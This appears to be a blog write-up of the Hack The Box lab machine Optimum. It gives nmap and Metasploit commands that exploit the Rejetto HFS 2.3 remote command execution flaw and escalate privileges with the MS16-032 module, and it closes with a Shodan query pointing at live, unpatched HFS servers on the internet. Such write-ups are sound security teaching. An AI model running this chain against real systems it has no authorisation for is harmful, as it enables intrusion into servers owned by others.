Last week I was working on retried HTB machine Optimum. Cool example for simple enumeration with attack using vulnerability for service (web file server), and then privilege escalation using local exploit for unpatched Windows 2012 server. It is example of real case scenario. Great to make presentation especially to higher management or teams which don’t give a fuck about patching process :)
There is a lot of writeups and step by step instructions for this machine so I will just give you a short introduction what I did and what you can learn from this example.
As we know our target we can skip reconnaissance and go to enumeration/scanning.
1 | sudo nmap -sV -A -oN optimium.txt <TARGET_IP> |
-sV Probe open ports to determine service/version info.-A Enable OS detection, version detection, script scanning, and traceroute.-oN Output scan in normal.
Our results is the version of operating system (with a probability as a percentage), open ports and services running on it, with version of running software.
Nmap reveals just one open service, which is HttpFileServer version 2.3. A bit of searching reveals that this particular version has a remote command execution vulnerability (CVE-2014-6287).
Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.
Cool. As we know this is port 80 and file server service we can put IP address to the web browser. We will see the web interface of HttpFileServer with information about version, same as we found using Nmap.
This vulnerability was discovered in 2014, official Metasploit module was added in 2018. If you will Google phrase CVE-2014-6287 exploit you will se results from exploit-db, but a few results below you can find results from Rapid7 (owner of Metasploit). This page will literally show you how to choose and use module to exploit this vulnerability.
So yeah, lets go to msfconsole and run few commands.
1 | use exploit/windows/http/rejetto_hfs_exec |
After it is complete, the magic is done and new, default Meterpreter session is opened. What this mean for you? You are on the target machine. Check few things.
On what system you are:
1 | sysinfo |
Where you are:
1 | pwd |
And who you are:
1 | getuid |
What do you see:
1 | dir |
You can see you are on Windows 2012 Server x64 machine (the same info you had from Nmap scan). You are located in user catalogue (you have same privilege’s as user who is running HFS service, this is why it is worth to run server apps by users dedicated to specific application or service, like Nginx by www-user in Linux etc.)
BTW, to get the flag in HTB you need to check user.txt file on desktop for standard user. Flag is inside the file. For root flag you need to get access to Administrator desktop, there is a file called root.txt with flag.
At the moment we have access to Windows 2012 server as a standard user, we have access to all data belongs to user. Now we need to try to escalate our privileges to get greater access. Would be cool to get Admin access to that server, right? If we will do that, it means we are the new server owner :)
In the meantime if you are new with Metasploit and Meterpreter, check how to use it, how to move between sessions and use basic commands. This link will be useful to you.
If you run command ps you will see a list of running process. Guess which one is our payload? The defaultreverse_tcp shell is x32 architecture and looks suspicious (we used the default one as this is just CTF exercise). Migrate it to x64 process, to be able run other exploits. On process list search for explorer.exe or any other which is running as x64, remember it PID.
1 | migrate PID |
Check again process list again and check results, also run sysinfo to check that Meterpreter session is now in x64 version. We are ready for next step. Put the Meterpreter session into the background.
1 | background |
Now we are trying to find some local exploit for Windows Server 2012. If server is not patched and up to date there is quite big chance to escalate privilege’s. You can search for exploit in Google again, just type Windows 2012 privilege escalation, review results. Similar situation like for previous exploit, there are results from Exploit-DB and Rapid7. You can also search for local exploits in Metasploit.
1 | search exploit/windows/local |
Review their description and try one by one the one which you think can work. You can also try to automate this by running Suggester. To check on what session your Meterpreter is running just type sessions in Metasploit, you will see the list of active sessions.
1 | search suggester |
As the name of module suggests, the module will suggest possible solutions ;) But it doesn’t work very well, in many cases I never hit any good. No worries at all, remember? You already did research in Google. The MS16-032 is the one you should use for HTB.
Again, play with Metasploit.
1 | use exploit/windows/local/ms16_032_secondary_logon_handle_privesc |
If server is vulnerable (and in this case it is) you have new Meterpreter session. Look around using same set of commands sysinfo, pwd, getuid, dir. Yes you have access to the system account. Easy peasy.
What did you learn?
- Enumerating ports and services
- Identifying vulnerable services
- Identifying known exploits
- Basic Windows privilege escalation techniques
and most important
- never ever complain about system/software updates, and do it as fast as possible.
To be honest this example was created to show you something more. It doesn’t matter if it’s a server, a computer at home or a router on the local network. Each unpatched application or system makes it easy to take over. And now for the best, vulnerability for HFS detected on 09/11/2014, privilege’s escalation in Windows 7-10 and 2k8-2k12 32 and 64 bit detected on 03/21/2016, everything is pretty old right?
Now go to Shodan. Make quick search, ekhm, let say this one product:"HttpFileServer" version:"2.3" -version:"2.3 beta". Check few results. Do you believe what you see? I do. It’s 2021 and there are still unpatched servers you can takeover using method described above. Now consider how many other unpatched vulnerabilities you can find and carry out a similar attack. The answer is… too many :)